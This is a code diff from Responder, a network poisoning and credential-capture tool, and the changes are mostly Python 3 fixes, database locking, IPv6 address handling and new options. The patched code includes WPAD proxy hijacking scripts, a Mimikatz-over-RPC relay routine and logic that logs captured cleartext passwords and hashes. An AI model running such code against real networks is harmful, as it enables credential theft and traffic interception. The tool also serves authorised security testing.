self.SMBClearLog = os.path.join(self.LogDir, 'SMB-Clear-Text-Password-%s.txt')
self.SMTPClearLog = os.path.join(self.LogDir, 'SMTP-Clear-Text-Password-%s.txt')
self.MSSQLClearLog = os.path.join(self.LogDir, 'MSSQL-Clear-Text-Password-%s.txt')
@@ -203,17 +278,32 @@ class Settings:
self.HtmlToInject = config.get('HTTP Server', 'HtmlToInject')
if len(self.HtmlToInject) == 0:
self.HtmlToInject = "<img src='file://///"+self.Bind_To+"/pictures/logo.jpg' alt='Loading' height='1' width='1'>"
self.HtmlToInject = ""# Let users set it up themself in Responder.conf. "<img src='file://///"+self.Bind_To+"/pictures/logo.jpg' alt='Loading' height='1' width='1'>"
if len(self.WPAD_Script) == 0:
self.WPAD_Script = 'function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; return "PROXY '+self.Bind_To+':3128; PROXY '+self.Bind_To+':3141; DIRECT";}'
if self.WPAD_On_Off:
self.WPAD_Script = 'function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; return "PROXY '+self.Bind_To+':3128; DIRECT";}'
if self.ProxyAuth_On_Off:
self.WPAD_Script = 'function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; return "PROXY '+self.Bind_To+':3128; DIRECT";}'
if self.Serve_Exe == True:
if not os.path.exists(self.Html_Filename):
print(utils.color("/!\ Warning: %s: file not found" % self.Html_Filename, 3, 1))
print(utils.color("/!\\ Warning: %s: file not found" % self.Html_Filename, 3, 1))
if not os.path.exists(self.Exe_Filename):
print(utils.color("/!\ Warning: %s: file not found" % self.Exe_Filename, 3, 1))
print(utils.color("/!\\ Warning: %s: file not found" % self.Exe_Filename, 3, 1))
# DHCPv6 Server Options
try:
self.DHCPv6_Domain = config.get('DHCPv6 Server', 'DHCPv6_Domain')
self.DHCPv6_SendRA = self.toBool(config.get('DHCPv6 Server', 'SendRA'))
self.Bind_To_IPv6 = config.get('DHCPv6 Server', 'BindToIPv6')
except:
# Defaults if section doesn't exist
self.DHCPv6_Domain = ''
self.DHCPv6_SendRA = False
self.Bind_To_IPv6 = ''
# SSL Options
self.SSLKey = config.get('HTTPS Server', 'SSLKey')
@@ -223,6 +313,7 @@ class Settings:
self.RespondTo = list(filter(None, [x.upper().strip() for x in config.get('Responder Core', 'RespondTo').strip().split(',')]))
self.RespondToName = list(filter(None, [x.upper().strip() for x in config.get('Responder Core', 'RespondToName').strip().split(',')]))
self.DontRespondTo = list(filter(None, [x.upper().strip() for x in config.get('Responder Core', 'DontRespondTo').strip().split(',')]))
self.DontRespondToTLD = list(filter(None, [x.upper().strip() for x in config.get('Responder Core', 'DontRespondToTLD').strip().split(',')]))
self.DontRespondToName_= list(filter(None, [x.upper().strip() for x in config.get('Responder Core', 'DontRespondToName').strip().split(',')]))
#add a .local to all provided DontRespondToName
self.MDNSTLD = ['.LOCAL']
@@ -284,7 +375,7 @@ class Settings:
pass
else:
#If it's the first time, generate SSL certs for this Responder session and send openssl output to /dev/null
Certs = os.system("./certs/gen-self-signed-cert.sh >/dev/null 2>&1")
Certs = os.system(self.ResponderPATH+"/certs/gen-self-signed-cert.sh >/dev/null 2>&1")
try:
NetworkCard = subprocess.check_output(["ifconfig", "-a"])
@@ -295,10 +386,12 @@ class Settings:
NetworkCard = "Error fetching Network Interfaces:", ex
pass
try:
DNS = subprocess.check_output(["cat", "/etc/resolv.conf"])
except subprocess.CalledProcessError as ex:
DNS = "Error fetching DNS configuration:", ex
pass
p = subprocess.Popen('resolvectl', stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
DNS = p.stdout.read()
except:
p = subprocess.Popen(['cat', '/etc/resolv.conf'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
DNS = p.stdout.read()
try:
RoutingInfo = subprocess.check_output(["netstat", "-rn"])
except:
@@ -311,7 +404,7 @@ class Settings:
Message = "%s\nCurrent environment is:\nNetwork Config:\n%s\nDNS Settings:\n%s\nRouting info:\n%s\n\n"%(utils.HTTPCurrentDate(), NetworkCard.decode('latin-1'),DNS.decode('latin-1'),RoutingInfo.decode('latin-1'))
try:
utils.DumpConfig(self.ResponderConfigDump, Message)
utils.DumpConfig(self.ResponderConfigDump,str(self))
#utils.DumpConfig(self.ResponderConfigDump,str(self))
except AttributeError as ex:
print("Missing Module:", ex)
pass

4
tools/MultiRelay/RelayMultiCore.py
View File

@@ -636,7 +636,7 @@ def MimiKatzRPC(Command, f, host, data, s):
Output = ExtractRPCCommandOutput(data)[12:]
while True:
dataoffset = dataoffset + buffsize
if data[64:66] == b"\x05\x00" and data[67] == b"\x02":##Last DCE/RPC Frag
if data[64:66] == b"\x05\x00" and data[67:68] == b"\x02":##Last DCE/RPC Frag
LastFragLen = struct.unpack('<h', data[61:63])[0]
if LastFragLen < 1024:
Output += ExtractRPCCommandOutput(data)
@@ -646,7 +646,7 @@ def MimiKatzRPC(Command, f, host, data, s):
Output += ExtractRPCCommandOutput(data)
break
if data[64:66] == b"\x05\x00" and data[67] == b"\x03":##First and Last DCE/RPCFrag
if data[64:66] == b"\x05\x00" and data[67:68] == b"\x03":##First and Last DCE/RPCFrag
data, s, out = SMBDCERPCReadOutput(StructWithLenPython2or3("<i", dataoffset), StructWithLenPython2or3('<h', 4096),f, data, s)
Output += ExtractRPCCommandOutput(data)
break

5
tools/MultiRelay/odict.py
View File

@@ -3,7 +3,10 @@ try:
from UserDict import DictMixin
except ImportError:
from collections import UserDict
from collections import MutableMapping as DictMixin
try:
from collections import MutableMapping as DictMixin
except ImportError:
from collections.abc import MutableMapping as DictMixin
class OrderedDict(dict, DictMixin):

17
tools/RunFinger.py
View File

@@ -1,4 +1,4 @@
#!/usr/bin/env python
#!/usr/bin/env python3
# This file is part of Responder, a network take-over set of tools
# created and maintained by Laurent Gaffie.
# email: laurent.gaffie@gmail.com
@@ -106,7 +106,7 @@ def ParseNegotiateSMB2Ans(data):
def SMB2SigningMandatory(data):
global SMB2signing
if data[70] == "\x03":
if data[70:71] == "\x03":
SMB2signing = "True"
else:
SMB2signing = "False"
@@ -123,7 +123,7 @@ def WorkstationFingerPrint(data):
b"\x06\x01" :"Windows 7/Server 2008R2",
b"\x06\x02" :"Windows 8/Server 2012",
b"\x06\x03" :"Windows 8.1/Server 2012R2",
b"\x0A\x00" :"Windows 10/Server 2016/2019 (check build)",
b"\x0A\x00" :"Windows 10/Server 2016/2022 (check build)",
}.get(data, 'Other than Microsoft')
def GetOsBuildNumber(data):
@@ -201,7 +201,7 @@ def IsDCVuln(t, host):
#####################
def IsSigningEnabled(data):
if data[39] == "\x0f":
if data[39:40] == "\x0f":
return 'True'
else:
return 'False'
@@ -251,7 +251,6 @@ def DomainGrab(Host):
buffer0 = longueur(packet0)+packet0
s.send(NetworkSendBufferPython2or3(buffer0))
data = s.recv(2048)
s.close()
if data[8:10] == b'\x72\x00':
return GetHostnameAndDomainName(data)
except IOError as e:
@@ -359,12 +358,12 @@ def ConnectAndChoseSMB(host):
if not data:
break
except Exception:
pass
return False
else:
return False
def handle(data, host):
if data[28] == "\x00":
if data[28:29] == "\x00":
a = SMBv2Head()
a.calculate()
b = SMBv2Negotiate()
@@ -373,7 +372,7 @@ def handle(data, host):
buffer0 = longueur(packet0)+packet0
return buffer0
if data[28] == "\x01":
if data[28:29] == "\x01":
global Bootime
SMB2SigningMandatory(data)
Bootime = IsDCVuln(GetBootTime(data[116:124]), host[0])
@@ -385,7 +384,7 @@ def handle(data, host):
buffer0 = longueur(packet0)+packet0
return buffer0
if data[28] == "\x02":
if data[28:29] == "\x02":
ParseSMBNTLM2Exchange(data, host[0], Bootime, SMB2signing)
##################

5
tools/RunFingerPackets.py
View File

@@ -1,4 +1,5 @@
import random, struct, sys
import random, struct, sys, os
from os import urandom
from socket import *
from time import sleep
from odict import OrderedDict
@@ -522,7 +523,7 @@ class SMBv2Negotiate(Packet):
("SecurityMode", "\x01\x00"),
("Reserved","\x00\x00"),
("Capabilities","\x00\x00\x00\x00"),
("ClientGUID","\xd5\xa1\x5f\x6e\x9a\x75\xe1\x11\x87\x82\x00\x01\x4a\xf1\x18\xee"),
("ClientGUID", urandom(16).decode('latin-1')),
("ClientStartTime","\x00\x00\x00\x00\x00\x00\x00\x00"),
("Dialect1","\x02\x02"),
("Dialect2","\x10\x02"),

2
tools/SMBFinger/Finger.py
View File

@@ -152,7 +152,7 @@ def color(txt, code = 1, modifier = 0):
return "\033[%d;3%dm%s\033[0m" % (modifier, code, txt)
def IsSigningEnabled(data):
if data[39] == "\x0f":
if data[39:40] == b"\x0f":
return True
else:
return False

5
tools/SMBFinger/odict.py
View File

@@ -3,7 +3,10 @@ try:
from UserDict import DictMixin
except ImportError:
from collections import UserDict
from collections import MutableMapping as DictMixin
try:
from collections import MutableMapping as DictMixin
except ImportError:
from collections.abc import MutableMapping as DictMixin
class OrderedDict(dict, DictMixin):

354
utils.py Executable file → Normal file
View File

@@ -20,6 +20,7 @@ import re
import logging
import socket
import time
import threading
import settings
import datetime
import codecs
@@ -28,8 +29,13 @@ import random
try:
import netifaces
except:
sys.exit('You need to install python-netifaces or run Responder with python3...\nTry "apt-get install python-netifaces" or "pip install netifaces"')
sys.exit('You need to install python3-netifaces or run Responder with python3...\nTry "apt-get install python3-netifaces" or "pip install netifaces"')
try:
import aioquic
except:
sys.exit('You need to install aioquic...\nTry "apt-get install python-aioquic" or "pip install aioquic"')
from calendar import timegm
def if_nametoindex2(name):
@@ -82,6 +88,9 @@ except:
print("[!] Please install python-sqlite3 extension.")
sys.exit(0)
# Thread lock for database operations to prevent "database is locked" errors
_db_lock = threading.Lock()
def color(txt, code = 1, modifier = 0):
if txt.startswith('[*]'):
settings.Config.PoisonersLogger.warning(txt)
@@ -122,7 +131,10 @@ def RespondToThisIP(ClientIp):
return False
def RespondToThisName(Name):
if settings.Config.RespondToName and Name.upper() not in settings.Config.RespondToName:
if [i for i in settings.Config.DontRespondToTLD if Name.upper().endswith(i)]:
return False
elif settings.Config.RespondToName and Name.upper() not in settings.Config.RespondToName:
return False
elif Name.upper() in settings.Config.RespondToName or settings.Config.RespondToName == []:
if Name.upper() not in settings.Config.DontRespondToName:
@@ -180,7 +192,7 @@ def IsOsX():
def IsIPv6IP(IP):
if IP == None:
return False
regex = "(([0-9a-fA-F]{1,4}:){7,7}[0-9a-fA-F]{1,4}|([0-9a-fA-F]{1,4}:){1,7}:|([0-9a-fA-F]{1,4}:){1,6}:[0-9a-fA-F]{1,4}|([0-9a-fA-F]{1,4}:){1,5}(:[0-9a-fA-F]{1,4}){1,2}|([0-9a-fA-F]{1,4}:){1,4}(:[0-9a-fA-F]{1,4}){1,3}|([0-9a-fA-F]{1,4}:){1,3}(:[0-9a-fA-F]{1,4}){1,4}|([0-9a-fA-F]{1,4}:){1,2}(:[0-9a-fA-F]{1,4}){1,5}|[0-9a-fA-F]{1,4}:((:[0-9a-fA-F]{1,4}){1,6})|:((:[0-9a-fA-F]{1,4}){1,7}|:)|fe80:(:[0-9a-fA-F]{0,4}){0,4}%[0-9a-zA-Z]{1,}|::(ffff(:0{1,4}){0,1}:){0,1}((25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])\.){3,3}(25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])|([0-9a-fA-F]{1,4}:){1,4}:((25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])\.){3,3}(25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9]))"
regex = r"(([0-9a-fA-F]{1,4}:){7,7}[0-9a-fA-F]{1,4}|([0-9a-fA-F]{1,4}:){1,7}:|([0-9a-fA-F]{1,4}:){1,6}:[0-9a-fA-F]{1,4}|([0-9a-fA-F]{1,4}:){1,5}(:[0-9a-fA-F]{1,4}){1,2}|([0-9a-fA-F]{1,4}:){1,4}(:[0-9a-fA-F]{1,4}){1,3}|([0-9a-fA-F]{1,4}:){1,3}(:[0-9a-fA-F]{1,4}){1,4}|([0-9a-fA-F]{1,4}:){1,2}(:[0-9a-fA-F]{1,4}){1,5}|[0-9a-fA-F]{1,4}:((:[0-9a-fA-F]{1,4}){1,6})|:((:[0-9a-fA-F]{1,4}){1,7}|:)|fe80:(:[0-9a-fA-F]{0,4}){0,4}%[0-9a-zA-Z]{1,}|::(ffff(:0{1,4}){0,1}:){0,1}((25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])\.){3,3}(25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])|([0-9a-fA-F]{1,4}:){1,4}:((25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])\.){3,3}(25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9]))"
ret = re.search(regex, IP)
if ret:
return True
@@ -219,39 +231,127 @@ def FindLocalIP(Iface, OURIP):
print(color("[!] Error: %s: Interface not found" % Iface, 1))
sys.exit(-1)
def Probe_IPv6_socket():
"""Return true is IPv6 sockets are really supported, and False when IPv6 is not supported."""
if not socket.has_ipv6:
return False
try:
with socket.socket(socket.AF_INET6, socket.SOCK_STREAM) as s:
s.bind(("::1", 0))
return True
except:
return False
def IsLinkLocal(ip):
"""
Check if an IPv6 address is link-local (fe80::/10).
Link-local addresses are in the range fe80:: to febf::
"""
if ip is None:
return False
ip_lower = ip.lower()
# fe80::/10 means first 10 bits are 1111111010
# This covers fe80:: through febf::
return ip_lower.startswith('fe8') or ip_lower.startswith('fe9') or \
ip_lower.startswith('fea') or ip_lower.startswith('feb')
def GetLinkLocalIP6(Iface):
"""
Get the link-local IPv6 address for a specific interface.
Args:
Iface: Interface name (e.g., 'eth0')
Returns:
Link-local IPv6 address string, or None if not found
"""
try:
addrs = netifaces.ifaddresses(Iface)
if netifaces.AF_INET6 not in addrs:
return None
# Search through all IPv6 addresses for a link-local one
for addr_info in addrs[netifaces.AF_INET6]:
addr = addr_info.get("addr", "")
# Remove interface suffix (e.g., "fe80::1%eth0" -> "fe80::1")
clean_addr = addr.split('%')[0]
if IsLinkLocal(clean_addr):
return clean_addr
return None
except (KeyError, IndexError, ValueError):
return None
def FindLocalIP6(Iface, OURIP):
if Iface == 'ALL':
return '::'
"""
Find the IPv6 address to bind Responder's servers to.
FIXED LOGIC (prioritizes link-local):
1. If user provided explicit IPv6 via -6 option, use that
2. If interface is 'ALL', return '::' (bind to all interfaces)
3. Try to get link-local address (fe80::) - THIS WORKS ON LOCAL NETWORKS
4. Fallback to global IPv6 only if link-local not available
5. Last resort: ::1 with warning
Args:
Iface: Network interface name ('eth0') or 'ALL' for wildcard
OURIP: User-provided IPv6 via -6 option, or None
Returns:
IPv6 address string to bind to
"""
# Handle wildcard interface
if Iface == 'ALL':
return '::'
try:
# PRIORITY 1: If user explicitly provided an IPv6 address with -6, use it
# This preserves the original behavior for users who specify -6
if IsIPv6IP(OURIP):
return OURIP
# PRIORITY 2: Get link-local address (fe80::)
# This is the FIX - link-local is ALWAYS reachable on local segment
link_local = GetLinkLocalIP6(Iface)
if link_local:
return link_local
# PRIORITY 3: Fallback to global IPv6 via socket trick
# Only used if no link-local available (rare on properly configured systems)
try:
# Connect to random IPv6 to determine source address
randIP = "2001:" + ":".join(("%x" % random.randint(0, 16**4) for i in range(7)))
s = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
s.connect((randIP, 80))
IP = s.getsockname()[0]
s.close()
if IP and IP != '::1':
# Warn the user this might not work
print(color('[!] Warning: No link-local IPv6 found, using global %s' % IP, 1, 1))
print(color('[!] This address may not be reachable on local network!', 1, 1))
return IP
except:
pass
# PRIORITY 4: Try to get any IPv6 from the interface
try:
IP = str(netifaces.ifaddresses(Iface)[netifaces.AF_INET6][0]["addr"].replace("%"+Iface, ""))
return IP
except:
pass
# No IPv6 available at all
print("[+] You don't have an IPv6 address assigned on %s." % Iface)
return '::1'
except socket.error:
print(color("[!] Error: %s: Interface not found" % Iface, 1))
sys.exit(-1)
try:
if IsIPv6IP(OURIP) == False:
try:
#Let's make it random so we don't get spotted easily.
randIP = "2001:" + ":".join(("%x" % random.randint(0, 16**4) for i in range(7)))
s = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
s.connect((randIP+':80', 1))
IP = s.getsockname()[0]
print('IP is: %s'%IP)
return IP
except:
try:
#Try harder; Let's get the local link addr
IP = str(netifaces.ifaddresses(Iface)[netifaces.AF_INET6][0]["addr"].replace("%"+Iface, ""))
return IP
except:
IP = '::1'
print("[+] You don't have an IPv6 address assigned.")
return IP
else:
return OURIP
except socket.error:
print(color("[!] Error: %s: Interface not found" % Iface, 1))
sys.exit(-1)
# Function used to write captured hashs to a file.
def WriteData(outfile, data, user):
@@ -304,6 +404,7 @@ def NetworkRecvBufferPython2or3(data):
def CreateResponderDb():
if not os.path.exists(settings.Config.DatabaseFile):
cursor = sqlite3.connect(settings.Config.DatabaseFile)
cursor.execute('PRAGMA journal_mode=WAL')
cursor.execute('CREATE TABLE Poisoned (timestamp TEXT, Poisoner TEXT, SentToIp TEXT, ForName TEXT, AnalyzeMode TEXT)')
cursor.commit()
cursor.execute('CREATE TABLE responder (timestamp TEXT, module TEXT, type TEXT, client TEXT, hostname TEXT, user TEXT, cleartext TEXT, hash TEXT, fullhash TEXT)')
@@ -319,68 +420,71 @@ def SaveToDb(result):
result[k] = ''
result['client'] = result['client'].replace("::ffff:","")
if len(result['user']) < 2:
print(color('[*] Skipping one character username: %s' % result['user'], 3, 1))
text("[*] Skipping one character username: %s" % result['user'])
#Generate to much output for nothing..
#print(color('[*] Skipping one character username: %s' % result['user'], 3, 1))
#text("[*] Skipping one character username: %s" % result['user'])
return
cursor = sqlite3.connect(settings.Config.DatabaseFile)
cursor.text_factory = sqlite3.Binary # We add a text factory to support different charsets
if len(result['cleartext']):
fname = '%s-%s-ClearText-%s.txt' % (result['module'], result['type'], result['client'])
res = cursor.execute("SELECT COUNT(*) AS count FROM responder WHERE module=? AND type=? AND client=? AND LOWER(user)=LOWER(?) AND cleartext=?", (result['module'], result['type'], result['client'], result['user'], result['cleartext']))
else:
fname = '%s-%s-%s.txt' % (result['module'], result['type'], result['client'])
res = cursor.execute("SELECT COUNT(*) AS count FROM responder WHERE module=? AND type=? AND client=? AND LOWER(user)=LOWER(?)", (result['module'], result['type'], result['client'], result['user']))
(count,) = res.fetchone()
logfile = os.path.join(settings.Config.ResponderPATH, 'logs', fname)
if not count:
cursor.execute("INSERT INTO responder VALUES(datetime('now'), ?, ?, ?, ?, ?, ?, ?, ?)", (result['module'], result['type'], result['client'], result['hostname'], result['user'], result['cleartext'], result['hash'], result['fullhash']))
cursor.commit()
if not count or settings.Config.CaptureMultipleHashFromSameHost:
with open(logfile,"a") as outf:
if len(result['cleartext']): # If we obtained cleartext credentials, write them to file
outf.write('%s:%s\n' % (result['user'].encode('utf8', 'replace'), result['cleartext'].encode('utf8', 'replace')))
else: # Otherwise, write JtR-style hash string to file
outf.write(result['fullhash'] + '\n')#.encode('utf8', 'replace') + '\n')
if not count or settings.Config.Verbose: # Print output
if len(result['client']):
print(text("[%s] %s Client : %s" % (result['module'], result['type'], color(result['client'], 3))))
if len(result['hostname']):
print(text("[%s] %s Hostname : %s" % (result['module'], result['type'], color(result['hostname'], 3))))
if len(result['user']):
print(text("[%s] %s Username : %s" % (result['module'], result['type'], color(result['user'], 3))))
# Bu order of priority, print cleartext, fullhash, or hash
with _db_lock:
cursor = sqlite3.connect(settings.Config.DatabaseFile, timeout=10)
cursor.execute('PRAGMA journal_mode=WAL')
cursor.text_factory = sqlite3.Binary # We add a text factory to support different charsets
if len(result['cleartext']):
print(text("[%s] %s Password : %s" % (result['module'], result['type'], color(result['cleartext'], 3))))
fname = '%s-%s-ClearText-%s.txt' % (result['module'], result['type'], result['client'])
res = cursor.execute("SELECT COUNT(*) AS count FROM responder WHERE module=? AND type=? AND client=? AND LOWER(user)=LOWER(?) AND cleartext=?", (result['module'], result['type'], result['client'], result['user'], result['cleartext']))
else:
fname = '%s-%s-%s.txt' % (result['module'], result['type'], result['client'])
res = cursor.execute("SELECT COUNT(*) AS count FROM responder WHERE module=? AND type=? AND client=? AND LOWER(user)=LOWER(?)", (result['module'], result['type'], result['client'], result['user']))
elif len(result['fullhash']):
print(text("[%s] %s Hash : %s" % (result['module'], result['type'], color(result['fullhash'], 3))))
(count,) = res.fetchone()
logfile = os.path.join(settings.Config.ResponderPATH, 'logs', fname)
elif len(result['hash']):
print(text("[%s] %s Hash : %s" % (result['module'], result['type'], color(result['hash'], 3))))
if not count:
cursor.execute("INSERT INTO responder VALUES(datetime('now'), ?, ?, ?, ?, ?, ?, ?, ?)", (result['module'], result['type'], result['client'], result['hostname'], result['user'], result['cleartext'], result['hash'], result['fullhash']))
cursor.commit()
# Appending auto-ignore list if required
# Except if this is a machine account's hash
if settings.Config.AutoIgnore and not result['user'].endswith('$'):
settings.Config.AutoIgnoreList.append(result['client'])
print(color('[*] Adding client %s to auto-ignore list' % result['client'], 4, 1))
elif len(result['cleartext']):
print(color('[*] Skipping previously captured cleartext password for %s' % result['user'], 3, 1))
text('[*] Skipping previously captured cleartext password for %s' % result['user'])
else:
print(color('[*] Skipping previously captured hash for %s' % result['user'], 3, 1))
text('[*] Skipping previously captured hash for %s' % result['user'])
cursor.execute("UPDATE responder SET timestamp=datetime('now') WHERE user=? AND client=?", (result['user'], result['client']))
cursor.commit()
cursor.close()
if not count or settings.Config.CaptureMultipleHashFromSameHost:
with open(logfile,"a") as outf:
if len(result['cleartext']): # If we obtained cleartext credentials, write them to file
outf.write('%s:%s\n' % (result['user'].encode('utf8', 'replace'), result['cleartext'].encode('utf8', 'replace')))
else: # Otherwise, write JtR-style hash string to file
outf.write(result['fullhash'] + '\n')#.encode('utf8', 'replace') + '\n')
if not count or settings.Config.Verbose: # Print output
if len(result['client']):
print(text("[%s] %s Client : %s" % (result['module'], result['type'], color(result['client'], 3))))
if len(result['hostname']):
print(text("[%s] %s Hostname : %s" % (result['module'], result['type'], color(result['hostname'], 3))))
if len(result['user']):
print(text("[%s] %s Username : %s" % (result['module'], result['type'], color(result['user'], 3))))
# Bu order of priority, print cleartext, fullhash, or hash
if len(result['cleartext']):
print(text("[%s] %s Password : %s" % (result['module'], result['type'], color(result['cleartext'], 3))))
elif len(result['fullhash']):
print(text("[%s] %s Hash : %s" % (result['module'], result['type'], color(result['fullhash'], 3))))
elif len(result['hash']):
print(text("[%s] %s Hash : %s" % (result['module'], result['type'], color(result['hash'], 3))))
# Appending auto-ignore list if required
# Except if this is a machine account's hash
if settings.Config.AutoIgnore and not result['user'].endswith('$'):
settings.Config.AutoIgnoreList.append(result['client'])
print(color('[*] Adding client %s to auto-ignore list' % result['client'], 4, 1))
elif len(result['cleartext']):
print(color('[*] Skipping previously captured cleartext password for %s' % result['user'], 3, 1))
text('[*] Skipping previously captured cleartext password for %s' % result['user'])
else:
print(color('[*] Skipping previously captured hash for %s' % result['user'], 3, 1))
text('[*] Skipping previously captured hash for %s' % result['user'])
cursor.execute("UPDATE responder SET timestamp=datetime('now') WHERE user=? AND client=?", (result['user'], result['client']))
cursor.commit()
cursor.close()
def SavePoisonersToDb(result):
@@ -388,32 +492,37 @@ def SavePoisonersToDb(result):
if not k in result:
result[k] = ''
result['SentToIp'] = result['SentToIp'].replace("::ffff:","")
cursor = sqlite3.connect(settings.Config.DatabaseFile)
cursor.text_factory = sqlite3.Binary # We add a text factory to support different charsets
res = cursor.execute("SELECT COUNT(*) AS count FROM Poisoned WHERE Poisoner=? AND SentToIp=? AND ForName=? AND AnalyzeMode=?", (result['Poisoner'], result['SentToIp'], result['ForName'], result['AnalyzeMode']))
(count,) = res.fetchone()
if not count:
cursor.execute("INSERT INTO Poisoned VALUES(datetime('now'), ?, ?, ?, ?)", (result['Poisoner'], result['SentToIp'], result['ForName'], result['AnalyzeMode']))
cursor.commit()
with _db_lock:
cursor = sqlite3.connect(settings.Config.DatabaseFile, timeout=10)
cursor.execute('PRAGMA journal_mode=WAL')
cursor.text_factory = sqlite3.Binary # We add a text factory to support different charsets
res = cursor.execute("SELECT COUNT(*) AS count FROM Poisoned WHERE Poisoner=? AND SentToIp=? AND ForName=? AND AnalyzeMode=?", (result['Poisoner'], result['SentToIp'], result['ForName'], result['AnalyzeMode']))
(count,) = res.fetchone()
if not count:
cursor.execute("INSERT INTO Poisoned VALUES(datetime('now'), ?, ?, ?, ?)", (result['Poisoner'], result['SentToIp'], result['ForName'], result['AnalyzeMode']))
cursor.commit()
cursor.close()
cursor.close()
def SaveDHCPToDb(result):
for k in [ 'MAC', 'IP', 'RequestedIP']:
if not k in result:
result[k] = ''
cursor = sqlite3.connect(settings.Config.DatabaseFile)
cursor.text_factory = sqlite3.Binary # We add a text factory to support different charsets
res = cursor.execute("SELECT COUNT(*) AS count FROM DHCP WHERE MAC=? AND IP=? AND RequestedIP=?", (result['MAC'], result['IP'], result['RequestedIP']))
(count,) = res.fetchone()
if not count:
cursor.execute("INSERT INTO DHCP VALUES(datetime('now'), ?, ?, ?)", (result['MAC'], result['IP'], result['RequestedIP']))
cursor.commit()
with _db_lock:
cursor = sqlite3.connect(settings.Config.DatabaseFile, timeout=10)
cursor.execute('PRAGMA journal_mode=WAL')
cursor.text_factory = sqlite3.Binary # We add a text factory to support different charsets
res = cursor.execute("SELECT COUNT(*) AS count FROM DHCP WHERE MAC=? AND IP=? AND RequestedIP=?", (result['MAC'], result['IP'], result['RequestedIP']))
(count,) = res.fetchone()
if not count:
cursor.execute("INSERT INTO DHCP VALUES(datetime('now'), ?, ?, ?)", (result['MAC'], result['IP'], result['RequestedIP']))
cursor.commit()
cursor.close()
cursor.close()
def Parse_IPV6_Addr(data):
if data[len(data)-4:len(data)] == b'\x00\x1c\x00\x01':
@@ -468,28 +577,21 @@ def banner():
])
print(banner)
print("\n \033[1;33mNBT-NS, LLMNR & MDNS %s\033[0m" % settings.__version__)
print('')
print(" To support this project:")
print(" Patreon -> https://www.patreon.com/PythonResponder")
print(" Paypal -> https://paypal.me/PythonResponder")
print('')
print(" Author: Laurent Gaffie (laurent.gaffie@gmail.com)")
print(" To kill this script hit CTRL-C")
print('')
def StartupMessage():
enabled = color('[ON]', 2, 1)
disabled = color('[OFF]', 1, 1)
print('')
print(color("[*] ", 2, 1) + 'Tips jar:\n USDT -> 0xCc98c1D3b8cd9b717b5257827102940e4E17A19A\n BTC -> bc1q9360jedhhmps5vpl3u05vyg4jryrl52dmazz49\n')
print(color("[+] ", 2, 1) + "Poisoners:")
print(' %-27s' % "LLMNR" + (enabled if settings.Config.AnalyzeMode == False else disabled))
print(' %-27s' % "NBT-NS" + (enabled if settings.Config.AnalyzeMode == False else disabled))
print(' %-27s' % "MDNS" + (enabled if settings.Config.AnalyzeMode == False else disabled))
print(' %-27s' % "LLMNR" + (enabled if (settings.Config.AnalyzeMode == False and settings.Config.LLMNR_On_Off) else disabled))
print(' %-27s' % "NBT-NS" + (enabled if (settings.Config.AnalyzeMode == False and settings.Config.NBTNS_On_Off) else disabled))
print(' %-27s' % "MDNS" + (enabled if (settings.Config.AnalyzeMode == False and settings.Config.MDNS_On_Off) else disabled))
print(' %-27s' % "DNS" + enabled)
print(' %-27s' % "DHCP" + (enabled if settings.Config.DHCP_On_Off else disabled))
print(' %-27s' % "DHCPv6" + (enabled if settings.Config.DHCPv6_On_Off else disabled))
print('')
print(color("[+] ", 2, 1) + "Servers:")
@@ -506,6 +608,7 @@ def StartupMessage():
print(' %-27s' % "SMTP server" + (enabled if settings.Config.SMTP_On_Off else disabled))
print(' %-27s' % "DNS server" + (enabled if settings.Config.DNS_On_Off else disabled))
print(' %-27s' % "LDAP server" + (enabled if settings.Config.LDAP_On_Off else disabled))
print(' %-27s' % "MQTT server" + (enabled if settings.Config.MQTT_On_Off else disabled))
print(' %-27s' % "RDP server" + (enabled if settings.Config.RDP_On_Off else disabled))
print(' %-27s' % "DCE-RPC server" + (enabled if settings.Config.DCERPC_On_Off else disabled))
print(' %-27s' % "WinRM server" + (enabled if settings.Config.WinRM_On_Off else disabled))
@@ -527,7 +630,6 @@ def StartupMessage():
print(' %-27s' % "Force LM downgrade" + (enabled if settings.Config.LM_On_Off == True else disabled))
print(' %-27s' % "Force ESS downgrade" + (enabled if settings.Config.NOESS_On_Off == True or settings.Config.LM_On_Off == True else disabled))
print('')
print(color("[+] ", 2, 1) + "Generic Options:")
print(' %-27s' % "Responder NIC" + color('[%s]' % settings.Config.Interface, 5, 1))
print(' %-27s' % "Responder IP" + color('[%s]' % settings.Config.Bind_To, 5, 1))
@@ -549,10 +651,20 @@ def StartupMessage():
print(' %-27s' % "Don't Respond To" + color(str(settings.Config.DontRespondTo), 5, 1))
if len(settings.Config.DontRespondToName):
print(' %-27s' % "Don't Respond To Names" + color(str(settings.Config.DontRespondToName), 5, 1))
if len(settings.Config.DontRespondToTLD):
print(' %-27s' % "Don't Respond To MDNS TLD" + color(str(settings.Config.DontRespondToTLD), 5, 1))
if settings.Config.TTL == None:
print(' %-27s' % "TTL for poisoned response "+ color('[default]', 5, 1))
else:
print(' %-27s' % "TTL for poisoned response" + color(str(settings.Config.TTL.encode().hex()) + " ("+ str(int.from_bytes(str.encode(settings.Config.TTL),"big")) +" seconds)", 5, 1))
print('')
print(color("[+] ", 2, 1) + "Current Session Variables:")
print(' %-27s' % "Responder Machine Name" + color('[%s]' % settings.Config.MachineName, 5, 1))
print(' %-27s' % "Responder Domain Name" + color('[%s]' % settings.Config.DomainName, 5, 1))
